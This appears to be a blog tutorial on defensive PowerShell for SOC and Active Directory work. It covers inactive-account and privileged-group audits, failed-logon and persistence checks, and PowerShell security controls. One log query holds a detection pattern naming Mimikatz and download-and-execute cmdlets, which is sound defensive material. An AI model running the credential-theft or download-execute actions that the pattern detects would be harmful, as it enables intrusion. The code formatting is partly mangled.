PowerShell for Security: AD Management, Log Analysis, and Blue Team Scripts
Part of the Cybersecurity Skills Guide — This article is one deep-dive in our complete guide series.
By HADESS Team | February 28, 2026 | Updated: February 28, 2026 | 5 min read
PowerShell is the primary automation tool for Windows environments, and most enterprise networks run Windows. If you work in a SOC, manage Active Directory, or handle incident response on Windows systems, PowerShell proficiency is not optional. It is also the language attackers use — understanding PowerShell helps you recognize and detect malicious usage.
Active Directory Management
AD management tasks that take hours in the GUI take seconds in PowerShell.
Find inactive accounts that should be disabled:
“powershell $threshold = (Get-Date).AddDays(-90) Get-ADUser -Filter {LastLogonDate -lt $threshold -and Enabled -eq $true} -Properties LastLogonDate | Select-Object Name, SamAccountName, LastLogonDate | Sort-Object LastLogonDate “
Audit group membership for privileged groups:
`powershell`
$groups = @("Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators")
foreach ($group in $groups) {
Write-Output "=== $group ==="
Get-ADGroupMember -Identity $group -Recursive |
Get-ADUser -Properties LastLogonDate, WhenCreated |
Select-Object Name, SamAccountName, LastLogonDate, WhenCreated
}
Detect accounts with Kerberos pre-auth disabled (AS-REP Roasting targets):
`powershell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
-Properties DoesNotRequirePreAuth |
Select-Object Name, SamAccountName
“
Log Analysis
Windows Event Logs contain rich security data. PowerShell extracts and filters it efficiently.
Find failed logon attempts (Event ID 4625):
`powershell`
Get-WinEvent -FilterHashtable @{
LogName = 'Security'
Id = 4625
StartTime = (Get-Date).AddHours(-24)
} | ForEach-Object {
$xml = [xml]$_.ToXml()
[PSCustomObject]@{
Time = $_.TimeCreated
Account = $xml.Event.EventData.Data[5].'#text'
Source = $xml.Event.EventData.Data[19].'#text'
Status = $xml.Event.EventData.Data[7].'#text'
}
} | Group-Object Source | Sort-Object Count -Descending
Detect PowerShell execution (Event ID 4104 — script block logging):
`powershell`
Get-WinEvent -FilterHashtable @{
LogName = 'Microsoft-Windows-PowerShell/Operational'
Id = 4104
} -MaxEvents 100 | Where-Object {
$_.Message -match 'Invoke-Mimikatz|Invoke-Expression|IEX|DownloadString'
} | Select-Object TimeCreated, Message
Blue Team Scripts
Build detection and response scripts that your SOC can run during investigations.
Baseline running processes and detect anomalies:
`powershell
Generate baseline
Get-Process | Select-Object Name, Path, Id |
Export-Csv -Path "C:\Security\process_baseline.csv" -NoTypeInformation
Compare current to baseline
$baseline = Import-Csv "C:\Security\process_baseline.csv"
$current = Get-Process | Select-Object Name, Path
$new = Compare-Object -ReferenceObject $baseline -DifferenceObject $current
-Property Name, Path | Where-Object { $_.SideIndicator -eq ‘=>’ }
“
Check for persistence mechanisms:
`powershell
Scheduled tasks created recently
Get-ScheduledTask | Where-Object {
$_.Date -gt (Get-Date).AddDays(-7)
} | Select-Object TaskName, TaskPath, Date, Author
Run keys
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
“
PowerShell Security Controls
Understand the controls because attackers bypass them and defenders rely on them:
- Constrained Language Mode limits available types and cmdlets, blocking most attack tools
- Script Block Logging (Event ID 4104) records every script block that executes, including deobfuscated content
- AMSI (Antimalware Scan Interface) sends scripts to antimalware before execution
- AppLocker/WDAC policies control which scripts and binaries can run
Enable all of these. Script block logging is particularly valuable because it captures the final deobfuscated script, defeating encoding and obfuscation techniques.
Related Career Paths
PowerShell skills map directly to SOC Analyst and Blue Team career paths. Windows endpoint investigation and Active Directory security monitoring depend on PowerShell fluency.
Next Steps
- Test your PowerShell skills with the skills assessment
- Browse the skills library for Windows security and incident response topics
- Use the coaching tool to build a practice plan around Windows security operations
Related Guides in This Series
- Bash Scripting for Security: Log Parsing, Automation, and Recon — HADESS | 2026
- Problem Solving for Security: Root Cause Analysis and Debugging
- Python for Security: Tooling, Automation, and Exploit Development
Take the Next Step
Browse 80+ skills on HADESS. Go to the browse 80+ skills on hadess on HADESS.
See your certification roadmap. Check out the see your certification roadmap.
Get started free — Create your HADESS account and access all career tools.
Frequently Asked Questions
How long does it take to learn this skill?
Most practitioners build working proficiency in 4-8 weeks of dedicated study with hands-on practice. Mastery takes longer and comes primarily through on-the-job experience.
Do I need certifications for this skill?
Certifications validate your knowledge to employers but are not strictly required. Hands-on experience and portfolio projects often carry more weight in technical interviews. Check the certification roadmap for relevant options.
What career paths use this skill?
Explore the career path explorer to see which roles require this skill and how it fits into different cybersecurity specializations.
—
HADESS Team consists of cybersecurity practitioners, hiring managers, and career strategists who have collectively spent 50+ years in the field.
